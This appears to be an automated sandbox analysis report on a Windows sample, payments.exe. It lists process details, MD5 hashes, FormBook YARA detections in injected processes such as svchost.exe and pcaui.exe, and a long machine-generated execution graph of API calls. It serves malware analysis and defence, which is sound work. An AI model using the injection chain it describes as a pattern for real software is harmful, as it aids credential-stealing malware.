                                                                                                                        Commandline:"C:\Users\user\Desktop\payments.exe"
                                                                                                                        Imagebase:0xc90000
                                                                                                                        File size:1'213'440 bytes
                                                                                                                        MD5 hash:63C1545A3E20B0DC33A010E441943D0F
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:2
                                                                                                                        Start time:10:20:08
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\payments.exe"
                                                                                                                        Imagebase:0x900000
                                                                                                                        File size:46'504 bytes
                                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:3
                                                                                                                        Start time:10:20:10
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe"
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:10:20:12
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                                                        Imagebase:0x280000
                                                                                                                        File size:135'680 bytes
                                                                                                                        MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        General

                                                                                                                        Target ID:6
                                                                                                                        Start time:10:20:27
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe"
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:140'800 bytes
                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high
                                                                                                                        Has exited:false

                                                                                                                        General

                                                                                                                        Target ID:8
                                                                                                                        Start time:10:20:39
                                                                                                                        Start date:21/11/2024
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                        Imagebase:0x7ff73feb0000
                                                                                                                        File size:676'768 bytes
                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:4%
                                                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                          Signature Coverage:9.8%
                                                                                                                          Total number of Nodes:2000
                                                                                                                          Total number of Limit Nodes:65
                                                                                                                          execution_graph 94009 d08eb8 94013 cda635 94009->94013 94011 d08ec3 94012 cda635 84 API calls 94011->94012 94012->94011 94014 cda66f 94013->94014 94018 cda642 94013->94018 94014->94011 94015 cda671 94054 caec4e 81 API calls 94015->94054 94016 cda676 94024 c9936c 94016->94024 94018->94014 94018->94015 94018->94016 94022 cda669 94018->94022 94020 cda67d 94044 c9510d 94020->94044 94053 ca4525 61 API calls _memcpy_s 94022->94053 94025 c99384 94024->94025 94042 c99380 94024->94042 94026 c99398 94025->94026 94027 d04bbf 94025->94027 94031 d04cbd __i64tow 94025->94031 94036 c993b0 __itow Mailbox _wcscpy 94025->94036 94055 cb172b 80 API calls 2 library calls 94026->94055 94028 d04ca5 94027->94028 94029 d04bc8 94027->94029 94071 cb172b 80 API calls 2 library calls 94028->94071 94035 d04be7 94029->94035 94029->94036 94031->94031 94034 c993ba 94034->94042 94065 c9ce19 94034->94065 94037 caf4ea 48 API calls 94035->94037 94056 caf4ea 94036->94056 94039 d04c04 94037->94039 94040 caf4ea 48 API calls 94039->94040 94041 d04c2a 94040->94041 94041->94042 94043 c9ce19 48 API calls 94041->94043 94042->94020 94043->94042 94045 c9511f 94044->94045 94046 d01be7 94044->94046 94105 c9b384 94045->94105 94114 cca58f 48 API calls _memcpy_s 94046->94114 94049 c9512b 94049->94014 94050 d01bf1 94115 c96eed 94050->94115 94052 d01bf9 Mailbox 94053->94014 94054->94016 94055->94036 94059 caf4f2 __calloc_impl 94056->94059 94058 caf50c 94058->94034 94059->94058 94060 caf50e std::exception::exception 94059->94060 94072 cb395c 94059->94072 94086 cb6805 RaiseException 94060->94086 94062 caf538 94087 cb673b 47 API calls _free 94062->94087 94064 caf54a 94064->94034 94066 c9ce28 __wsetenvp 94065->94066 94094 caee75 94066->94094 94068 c9ce50 _memcpy_s 94069 caf4ea 48 API calls 94068->94069 94070 c9ce66 94069->94070 94070->94042 94071->94036 94073 cb39d7 __calloc_impl 94072->94073 94079 cb3968 __calloc_impl 94072->94079 94093 cb7c0e 47 API calls __getptd_noexit 94073->94093 94076 cb399b RtlAllocateHeap 94076->94079 94085 cb39cf 94076->94085 94078 cb39c3 94091 cb7c0e 47 API calls __getptd_noexit 94078->94091 94079->94076 94079->94078 94082 cb3973 94079->94082 94083 cb39c1 94079->94083 94082->94079 94088 cb81c2 47 API calls __NMSG_WRITE 94082->94088 94089 cb821f 47 API calls 7 library calls 94082->94089 94090 cb1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94082->94090 94092 cb7c0e 47 API calls __getptd_noexit 94083->94092 94085->94059 94086->94062 94087->94064 94088->94082 94089->94082 94091->94083 94092->94085 94093->94085 94096 caf4ea __calloc_impl 94094->94096 94095 cb395c __malloc_crt 47 API calls 94095->94096 94096->94095 94097 caf50c 94096->94097 94098 caf50e std::exception::exception 94096->94098 94097->94068 94103 cb6805 RaiseException 94098->94103 94100 caf538 94104 cb673b 47 API calls _free 94100->94104 94102 caf54a 94102->94068 94103->94100 94104->94102 94106 c9b392 94105->94106 94107 c9b3c5 _memcpy_s 94105->94107 94106->94107 94108 c9b3b8 94106->94108 94109 c9b3fd 94106->94109 94107->94049 94107->94107 94119 c9bb85 94108->94119 94110 caf4ea 48 API calls 94109->94110 94112 c9b407 94110->94112 94113 caf4ea 48 API calls 94112->94113 94113->94107 94114->94050 94116 c96ef8 94115->94116 94117 c96f00 94115->94117 94124 c9dd47 48 API calls _memcpy_s 94116->94124 94117->94052 94120 c9bb9b 94119->94120 94123 c9bb96 _memcpy_s 94119->94123 94121 caee75 48 API calls 94120->94121 94122 d01b77 94120->94122 94121->94123 94122->94122 94123->94107 94124->94117 94125 c9ef80 94128 ca3b70 94125->94128 94127 c9ef8c 94129 ca3bc8 94128->94129 94150 ca42a5 94128->94150 94130 ca3bef 94129->94130 94132 d06fd1 94129->94132 94135 d06f7e 94129->94135 94141 d06f9b 94129->94141 94131 caf4ea 48 API calls 94130->94131 94133 ca3c18 94131->94133 94223 cececa 335 API calls Mailbox 94132->94223 94137 caf4ea 48 API calls 94133->94137 94135->94130 94138 d06f87 94135->94138 94136 d06fbe 94222 cdcc5c 86 API calls 4 library calls 94136->94222 94179 ca3c2c _memcpy_s __wsetenvp 94137->94179 94220 ced552 335 API calls Mailbox 94138->94220 94141->94136 94221 ceda0e 335 API calls 2 library calls 94141->94221 94143 ca42f2 94253 cdcc5c 86 API calls 4 library calls 94143->94253 94145 d073b0 94145->94127 94146 d0737a 94252 cdcc5c 86 API calls 4 library calls 94146->94252 94147 d07297 94242 cdcc5c 86 API calls 4 library calls 94147->94242 94246 cdcc5c 86 API calls 4 library calls 94150->94246 94152 ca40df 94243 cdcc5c 86 API calls 4 library calls 94152->94243 94154 d0707e 94224 cdcc5c 86 API calls 4 library calls 94154->94224 94158 cadce0 53 API calls 94158->94179 94160 c9d645 53 API calls 94160->94179 94162 caf4ea 48 API calls 94162->94179 94164 d072d2 94244 cdcc5c 86 API calls 4 library calls 94164->94244 94166 c9fe30 335 API calls 94166->94179 94168 d07350 94250 cdcc5c 86 API calls 4 library calls 94168->94250 94169 d072e9 94245 cdcc5c 86 API calls 4 library calls 94169->94245 94170 d07363 94251 cdcc5c 86 API calls 4 library calls 94170->94251 94177 d0714c 94239 ceccdc 48 API calls 94177->94239 94179->94143 94179->94146 94179->94147 94179->94150 94179->94152 94179->94154 94179->94158 94179->94160 94179->94162 94179->94164 94179->94166 94179->94168 94179->94169 94179->94170 94179->94177 94180 d0733f 94179->94180 94182 c9d286 48 API calls 94179->94182 94184 ca3f2b 94179->94184 94185 d071e1 94179->94185 94188 caee75 48 API calls 94179->94188 94189 c96eed 48 API calls 94179->94189 94200 c9d9a0 53 API calls __cinit 94179->94200 94201 c9d83d 53 API calls 94179->94201 94202 c9cdb9 48 API calls 94179->94202 94203 c9d6e9 94179->94203 94207 cac15c 48 API calls 94179->94207 94208 cac050 94179->94208 94219 cabecb 335 API calls 94179->94219 94225 c9dcae 50 API calls Mailbox 94179->94225 94226 ceccdc 48 API calls 94179->94226 94227 cda1eb 50 API calls 94179->94227 94228 c96a63 94179->94228 94249 cdcc5c 86 API calls 4 library calls 94180->94249 94182->94179 94184->94127 94185->94184 94248 cdcc5c 86 API calls 4 library calls 94185->94248 94186 d0715f 94198 d071a1 94186->94198 94240 ceccdc 48 API calls 94186->94240 94188->94179 94189->94179 94192 d071ce 94194 cac050 48 API calls 94192->94194 94196 d071d6 94194->94196 94195 d071ab 94195->94150 94195->94192 94196->94185 94197 d07313 94196->94197 94247 cdcc5c 86 API calls 4 library calls 94197->94247 94241 cac15c 48 API calls 94198->94241 94200->94179 94201->94179 94202->94179 94205 c9d6f4 94203->94205 94204 c9d71b 94204->94179 94205->94204 94254 c9d764 55 API calls 94205->94254 94207->94179 94209 cac064 94208->94209 94211 cac069 Mailbox 94208->94211 94255 cac1af 48 API calls 94209->94255 94216 cac077 94211->94216 94256 cac15c 48 API calls 94211->94256 94213 caf4ea 48 API calls 94215 cac108 94213->94215 94214 cac152 94214->94179 94217 caf4ea 48 API calls 94215->94217 94216->94213 94216->94214 94218 cac113 94217->94218 94218->94179 94219->94179 94220->94184 94221->94136 94222->94132 94223->94179 94224->94184 94225->94179 94226->94179 94227->94179 94229 c96adf 94228->94229 94232 c96a6f __wsetenvp 94228->94232 94261 c9b18b 94229->94261 94231 c96ab6 _memcpy_s 94231->94179 94233 c96a8b 94232->94233 94234 c96ad7 94232->94234 94257 c96b4a 94233->94257 94260 c9c369 48 API calls 94234->94260 94237 c96a95 94238 caee75 48 API calls 94237->94238 94238->94231 94239->94186 94240->94186 94241->94195 94242->94152 94243->94184 94244->94169 94245->94184 94246->94184 94247->94184 94248->94184 94249->94184 94250->94184 94251->94184 94252->94184 94253->94145 94254->94204 94255->94211 94256->94216 94258 caf4ea 48 API calls 94257->94258 94259 c96b54 94258->94259 94259->94237 94260->94231 94262 c9b1a2 _memcpy_s 94261->94262 94263 c9b199 94261->94263 94262->94231 94263->94262 94265 c9bdfa 94263->94265 94266 c9be0a _memcpy_s 94265->94266 94267 c9be0d 94265->94267 94266->94262 94268 caf4ea 48 API calls 94267->94268 94269 c9be17 94268->94269 94270 caee75 48 API calls 94269->94270 94270->94266 94271 d019ba 94276 cac75a 94271->94276 94275 d019c9 94284 c9d7f7 94276->94284 94281 cac865 94282 cac881 94281->94282 94292 cad1fa 48 API calls _memcpy_s 94281->94292 94283 cb0f0a 52 API calls __cinit 94282->94283 94283->94275 94285 caf4ea 48 API calls 94284->94285 94286 c9d818 94285->94286 94287 caf4ea 48 API calls 94286->94287 94288 c9d826 94287->94288 94289 cad26c 94288->94289 94293 cad298 94289->94293 94292->94281 94294 cad28b 94293->94294 94295 cad2a5 94293->94295 94294->94281 94295->94294 94296 cad2ac RegOpenKeyExW 94295->94296 94296->94294 94297 cad2c6 RegQueryValueExW 94296->94297 94298 cad2fc RegCloseKey 94297->94298 94299 cad2e7 94297->94299 94298->94294 94299->94298 94300 c93742 94301 c9374b 94300->94301 94302 c93769 94301->94302 94303 c937c8 94301->94303 94339 c937c6 94301->94339 94304 c9382c PostQuitMessage 94302->94304 94305 c93776 94302->94305 94307 d01e00 94303->94307 94308 c937ce 94303->94308 94331 c937b9 94304->94331 94310 d01e88 94305->94310 94311 c93781 94305->94311 94306 c937ab DefWindowProcW 94306->94331 94355 c92ff6 16 API calls 94307->94355 94312 c937d3 94308->94312 94313 c937f6 SetTimer RegisterWindowMessageW 94308->94313 94370 cd4ddd 60 API calls _memset 94310->94370 94315 c93789 94311->94315 94316 c93836 94311->94316 94319 d01da3 94312->94319 94320 c937da KillTimer 94312->94320 94317 c9381f CreatePopupMenu 94313->94317 94313->94331 94314 d01e27 94356 cae312 335 API calls Mailbox 94314->94356 94322 d01e6d 94315->94322 94323 c93794 94315->94323 94345 caeb83 94316->94345 94317->94331 94326 d01da8 94319->94326 94327 d01ddc MoveWindow 94319->94327 94352 c93847 Shell_NotifyIconW _memset 94320->94352 94322->94306 94369 cca5f3 48 API calls 94322->94369 94329 c9379f 94323->94329 94330 d01e58 94323->94330 94324 d01e9a 94324->94306 94324->94331 94332 d01dcb SetFocus 94326->94332 94333 d01dac 94326->94333 94327->94331 94329->94306 94357 c93847 Shell_NotifyIconW _memset 94329->94357 94368 cd55bd 70 API calls _memset 94330->94368 94332->94331 94333->94329 94337 d01db5 94333->94337 94334 c937ed 94353 c9390f DeleteObject DestroyWindow Mailbox 94334->94353 94354 c92ff6 16 API calls 94337->94354 94339->94306 94341 d01e68 94341->94331 94343 d01e4c 94358 c94ffc 94343->94358 94346 caeb9a _memset 94345->94346 94347 caec1c 94345->94347 94371 c951af 94346->94371 94347->94331 94349 caec05 KillTimer SetTimer 94349->94347 94350 caebc1 94350->94349 94351 d03c7a Shell_NotifyIconW 94350->94351 94351->94349 94352->94334 94353->94331 94354->94331 94355->94314 94356->94329 94357->94343 94359 c95027 _memset 94358->94359 94418 c94c30 94359->94418 94362 c950ac 94364 c950ca Shell_NotifyIconW 94362->94364 94365 d03d28 Shell_NotifyIconW 94362->94365 94366 c951af 50 API calls 94364->94366 94367 c950df 94366->94367 94367->94339 94368->94341 94369->94339 94370->94324 94372 c951cb 94371->94372 94392 c952a2 Mailbox 94371->94392 94393 c96b0f 94372->94393 94375 d03ca1 LoadStringW 94379 d03cbb 94375->94379 94376 c951e6 94377 c96a63 48 API calls 94376->94377 94378 c951fb 94377->94378 94378->94379 94380 c9520c 94378->94380 94381 c9510d 48 API calls 94379->94381 94382 c952a7 94380->94382 94383 c95216 94380->94383 94386 d03cc5 94381->94386 94384 c96eed 48 API calls 94382->94384 94385 c9510d 48 API calls 94383->94385 94389 c95220 _memset _wcscpy 94384->94389 94385->94389 94386->94389 94398 c9518c 94386->94398 94388 d03ce7 94391 c9518c 48 API calls 94388->94391 94390 c95288 Shell_NotifyIconW 94389->94390 94390->94392 94391->94389 94392->94350 94394 caf4ea 48 API calls 94393->94394 94395 c96b34 94394->94395 94396 c96b4a 48 API calls 94395->94396 94397 c951d9 94396->94397 94397->94375 94397->94376 94399 c95197 94398->94399 94400 c9519f 94399->94400 94401 d01ace 94399->94401 94408 c95130 94400->94408 94403 c96b4a 48 API calls 94401->94403 94405 d01adb __wsetenvp 94403->94405 94404 c951aa 94404->94388 94406 caee75 48 API calls 94405->94406 94407 d01b07 _memcpy_s 94406->94407 94409 c9513f __wsetenvp 94408->94409 94410 d01b27 94409->94410 94411 c95151 94409->94411 94413 c96b4a 48 API calls 94410->94413 94412 c9bb85 48 API calls 94411->94412 94415 c9515e _memcpy_s 94412->94415 94414 d01b34 94413->94414 94416 caee75 48 API calls 94414->94416 94415->94404 94417 d01b57 _memcpy_s 94416->94417 94419 d03c33 94418->94419 94420 c94c44 94418->94420 94419->94420 94421 d03c3c DestroyIcon 94419->94421 94420->94362 94422 cd5819 61 API calls _W_store_winword 94420->94422 94421->94420 94422->94362 94423 d0197b 94428 cadd94 94423->94428 94427 d0198a 94429 caf4ea 48 API calls 94428->94429 94430 cadd9c 94429->94430 94431 caddb0 94430->94431 94436 cadf3d 94430->94436 94435 cb0f0a 52 API calls __cinit 94431->94435 94435->94427 94437 cadda8 94436->94437 94438 cadf46 94436->94438 94440 caddc0 94437->94440 94468 cb0f0a 52 API calls __cinit 94438->94468 94441 c9d7f7 48 API calls 94440->94441 94442 caddd7 GetVersionExW 94441->94442 94443 c96a63 48 API calls 94442->94443 94444 cade1a 94443->94444 94469 cadfb4 94444->94469 94448 d024c8 94452 cadebb 94455 cadee3 94452->94455 94456 cadf31 GetSystemInfo 94452->94456 94453 cadea4 GetCurrentProcess 94486 cadf5f LoadLibraryA GetProcAddress 94453->94486 94480 cae00c 94455->94480 94457 cadf0e 94456->94457 94459 cadf1c FreeLibrary 94457->94459 94460 cadf21 94457->94460 94459->94460 94460->94431 94462 cadf29 GetSystemInfo 94465 cadf03 94462->94465 94463 cadef9 94483 cadff4 94463->94483 94465->94457 94467 cadf09 FreeLibrary 94465->94467 94467->94457 94468->94437 94470 cadfbd 94469->94470 94471 c9b18b 48 API calls 94470->94471 94472 cade22 94471->94472 94473 c96571 94472->94473 94474 c9657f 94473->94474 94475 c9b18b 48 API calls 94474->94475 94476 c9658f 94475->94476 94476->94448 94477 cadf77 94476->94477 94487 cadf89 94477->94487 94491 cae01e 94480->94491 94484 cae00c 2 API calls 94483->94484 94485 cadf01 GetNativeSystemInfo 94484->94485 94485->94465 94486->94452 94488 cadea0 94487->94488 94489 cadf92 LoadLibraryA 94487->94489 94488->94452 94488->94453 94489->94488 94490 cadfa3 GetProcAddress 94489->94490 94490->94488 94492 cadef1 94491->94492 94493 cae027 LoadLibraryA 94491->94493 94492->94462 94492->94463 94493->94492 94494 cae038 GetProcAddress 94493->94494 94494->94492 94495 d019dd 94500 c94a30 94495->94500 94497 d019f1 94520 cb0f0a 52 API calls __cinit 94497->94520 94499 d019fb 94501 c94a40 __ftell_nolock 94500->94501 94502 c9d7f7 48 API calls 94501->94502 94503 c94af6 94502->94503 94521 c95374 94503->94521 94505 c94aff 94528 c9363c 94505->94528 94508 c9518c 48 API calls 94509 c94b18 94508->94509 94534 c964cf 94509->94534 94512 c9d7f7 48 API calls 94513 c94b32 94512->94513 94540 c949fb 94513->94540 94515 c94b43 Mailbox 94515->94497 94516 c961a6 48 API calls 94519 c94b3d _wcscat Mailbox __wsetenvp 94516->94519 94517 c9ce19 48 API calls 94517->94519 94518 c964cf 48 API calls 94518->94519 94519->94515 94519->94516 94519->94517 94519->94518 94520->94499 94554 cbf8a0 94521->94554 94524 c9ce19 48 API calls 94525 c953a7 94524->94525 94556 c9660f 94525->94556 94527 c953b1 Mailbox 94527->94505 94529 c93649 __ftell_nolock 94528->94529 94563 c9366c GetFullPathNameW 94529->94563 94531 c9365a 94532 c96a63 48 API calls 94531->94532 94533 c93669 94532->94533 94533->94508 94536 c9651b 94534->94536 94539 c964dd _memcpy_s 94534->94539 94535 caf4ea 48 API calls 94537 c94b29 94535->94537 94538 caf4ea 48 API calls 94536->94538 94537->94512 94538->94539 94539->94535 94565 c9bcce 94540->94565 94543 c94a2b 94543->94519 94544 d041cc RegQueryValueExW 94545 d041e5 94544->94545 94546 d04246 RegCloseKey 94544->94546 94547 caf4ea 48 API calls 94545->94547 94548 d041fe 94547->94548 94571 c947b7 94548->94571 94551 d04224 94553 c96a63 48 API calls 94551->94553 94552 d0423b 94552->94546 94553->94552 94555 c95381 GetModuleFileNameW 94554->94555 94555->94524 94557 cbf8a0 __ftell_nolock 94556->94557 94558 c9661c GetFullPathNameW 94557->94558 94559 c96a63 48 API calls 94558->94559 94560 c96643 94559->94560 94561 c96571 48 API calls 94560->94561 94562 c9664f 94561->94562 94562->94527 94564 c9368a 94563->94564 94564->94531 94566 c9bce8 94565->94566 94570 c94a0a RegOpenKeyExW 94565->94570 94567 caf4ea 48 API calls 94566->94567 94568 c9bcf2 94567->94568 94569 caee75 48 API calls 94568->94569 94569->94570 94570->94543 94570->94544 94572 caf4ea 48 API calls 94571->94572 94573 c947c9 RegQueryValueExW 94572->94573 94573->94551 94573->94552 94574 d09c06 94585 cad3be 94574->94585 94576 d09c1c 94584 d09c91 Mailbox 94576->94584 94666 c91caa 49 API calls 94576->94666 94579 d09cc5 94581 d0a7ab Mailbox 94579->94581 94668 cdcc5c 86 API calls 4 library calls 94579->94668 94582 d09c71 94582->94579 94667 cdb171 48 API calls 94582->94667 94594 ca3200 94584->94594 94586 cad3ca 94585->94586 94587 cad3dc 94585->94587 94669 c9dcae 50 API calls Mailbox 94586->94669 94589 cad40b 94587->94589 94590 cad3e2 94587->94590 94670 c9dcae 50 API calls Mailbox 94589->94670 94592 caf4ea 48 API calls 94590->94592 94593 cad3d4 94592->94593 94593->94576 94671 c9bd30 94594->94671 94596 ca3267 94598 ca32f8 94596->94598 94599 d0907a 94596->94599 94658 ca3628 94596->94658 94744 cac36b 86 API calls 94598->94744 94779 cdcc5c 86 API calls 4 library calls 94599->94779 94602 ca3313 94654 ca34eb _memcpy_s Mailbox 94602->94654 94602->94658 94660 d094df 94602->94660 94676 c92b7a 94602->94676 94604 d091fa 94794 cdcc5c 86 API calls 4 library calls 94604->94794 94608 d0909a 94608->94604 94780 c9d645 94608->94780 94609 d093c5 94612 c9fe30 335 API calls 94609->94612 94610 d0926d 94798 cdcc5c 86 API calls 4 library calls 94610->94798 94614 d09407 94612->94614 94624 c9d6e9 55 API calls 94614->94624 94614->94658 94617 ca33ce 94621 d0945e 94617->94621 94622 ca3465 94617->94622 94617->94654 94619 d09220 94795 c91caa 49 API calls 94619->94795 94620 d09114 94631 d09128 94620->94631 94637 d09152 94620->94637 94804 cdc942 50 API calls 94621->94804 94627 caf4ea 48 API calls 94622->94627 94628 d09438 94624->94628 94644 ca346c 94627->94644 94803 cdcc5c 86 API calls 4 library calls 94628->94803 94629 d0923d 94634 d09252 94629->94634 94635 d0925e 94629->94635 94790 cdcc5c 86 API calls 4 library calls 94631->94790 94633 cac3c3 48 API calls 94633->94654 94796 cdcc5c 86 API calls 4 library calls 94634->94796 94797 cdcc5c 86 API calls 4 library calls 94635->94797 94641 d09177 94637->94641 94645 d09195 94637->94645 94791 cef320 335 API calls 94641->94791 94650 ca351f 94644->94650 94683 c9e8d0 94644->94683 94647 d0918b 94645->94647 94792 cef5ee 335 API calls 94645->94792 94646 caf4ea 48 API calls 94646->94654 94647->94658 94793 cac2d6 48 API calls _memcpy_s 94647->94793 94652 c96eed 48 API calls 94650->94652 94653 ca3540 94650->94653 94652->94653 94653->94658 94659 d094b0 94653->94659 94662 ca3585 94653->94662 94654->94608 94654->94609 94654->94610 94654->94628 94654->94633 94654->94646 94654->94650 94655 d09394 94654->94655 94654->94658 94746 c9d9a0 53 API calls __cinit 94654->94746 94747 c9d8c0 53 API calls 94654->94747 94748 cac2d6 48 API calls _memcpy_s 94654->94748 94749 c9fe30 94654->94749 94799 cecda2 82 API calls Mailbox 94654->94799 94800 cd80e3 53 API calls 94654->94800 94801 c9d764 55 API calls 94654->94801 94802 c9dcae 50 API calls Mailbox 94654->94802 94657 caf4ea 48 API calls 94655->94657 94657->94609 94665 ca3635 Mailbox 94658->94665 94778 cdcc5c 86 API calls 4 library calls 94658->94778 94805 c9dcae 50 API calls Mailbox 94659->94805 94660->94658 94806 cdcc5c 86 API calls 4 library calls 94660->94806 94662->94658 94662->94660 94663 ca3615 94662->94663 94745 c9dcae 50 API calls Mailbox 94663->94745 94665->94579 94666->94582 94667->94584 94668->94581 94669->94593 94670->94593 94672 c9bd3f 94671->94672 94675 c9bd5a 94671->94675 94673 c9bdfa 48 API calls 94672->94673 94674 c9bd47 CharUpperBuffW 94673->94674 94674->94675 94675->94596 94677 c92b8b 94676->94677 94678 d0436a 94676->94678 94679 caf4ea 48 API calls 94677->94679 94680 c92b92 94679->94680 94681 c92bb3 94680->94681 94807 c92bce 48 API calls 94680->94807 94681->94617 94684 c9e8f6 94683->94684 94717 c9e906 Mailbox 94683->94717 94685 c9ed52 94684->94685 94684->94717 94908 cae3cd 335 API calls 94685->94908 94687 c9ebc7 94688 c9ebdd 94687->94688 94909 c92ff6 16 API calls 94687->94909 94688->94654 94690 c9ed63 94690->94688 94691 c9ed70 94690->94691 94910 cae312 335 API calls Mailbox 94691->94910 94692 c9e94c PeekMessageW 94692->94717 94694 d0526e Sleep 94694->94717 94695 c9ed77 LockWindowUpdate DestroyWindow GetMessageW 94695->94688 94697 c9eda9 94695->94697 94699 d059ef TranslateMessage DispatchMessageW GetMessageW 94697->94699 94699->94699 94701 d05a1f 94699->94701 94700 c9ed21 PeekMessageW 94700->94717 94701->94688 94702 caf4ea 48 API calls 94702->94717 94703 c9ebf7 timeGetTime 94703->94717 94705 c96eed 48 API calls 94705->94717 94706 d05557 WaitForSingleObject 94711 d05574 GetExitCodeProcess CloseHandle 94706->94711 94706->94717 94707 c9ed3a TranslateMessage DispatchMessageW 94707->94700 94708 c9d7f7 48 API calls 94728 d05429 Mailbox 94708->94728 94709 c92aae 311 API calls 94709->94717 94710 d0588f Sleep 94710->94728 94711->94717 94712 c9edae timeGetTime 94911 c91caa 49 API calls 94712->94911 94714 d05733 Sleep 94714->94728 94717->94687 94717->94692 94717->94694 94717->94700 94717->94702 94717->94703 94717->94705 94717->94706 94717->94707 94717->94709 94717->94710 94717->94712 94717->94714 94721 d05445 Sleep 94717->94721 94717->94728 94730 c91caa 49 API calls 94717->94730 94735 c9fe30 311 API calls 94717->94735 94739 ca3200 311 API calls 94717->94739 94741 cdcc5c 86 API calls 94717->94741 94742 c9ce19 48 API calls 94717->94742 94743 c9d6e9 55 API calls 94717->94743 94808 c9ef00 94717->94808 94815 c9f110 94717->94815 94880 ca45e0 94717->94880 94897 cae244 94717->94897 94902 cadc5f 94717->94902 94907 c9eed0 335 API calls Mailbox 94717->94907 94912 cf8d23 48 API calls 94717->94912 94718 cadc38 timeGetTime 94718->94728 94719 d05926 GetExitCodeProcess 94722 d05952 CloseHandle 94719->94722 94723 d0593c WaitForSingleObject 94719->94723 94721->94717 94722->94728 94723->94717 94723->94722 94724 d05432 Sleep 94724->94721 94725 cf8c4b 108 API calls 94725->94728 94726 c92c79 107 API calls 94726->94728 94728->94708 94728->94717 94728->94718 94728->94719 94728->94721 94728->94724 94728->94725 94728->94726 94729 d059ae Sleep 94728->94729 94733 c9ce19 48 API calls 94728->94733 94736 c9d6e9 55 API calls 94728->94736 94913 cd4cbe 49 API calls Mailbox 94728->94913 94914 c91caa 49 API calls 94728->94914 94915 c92aae 335 API calls 94728->94915 94916 ceccb2 50 API calls 94728->94916 94917 cd7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 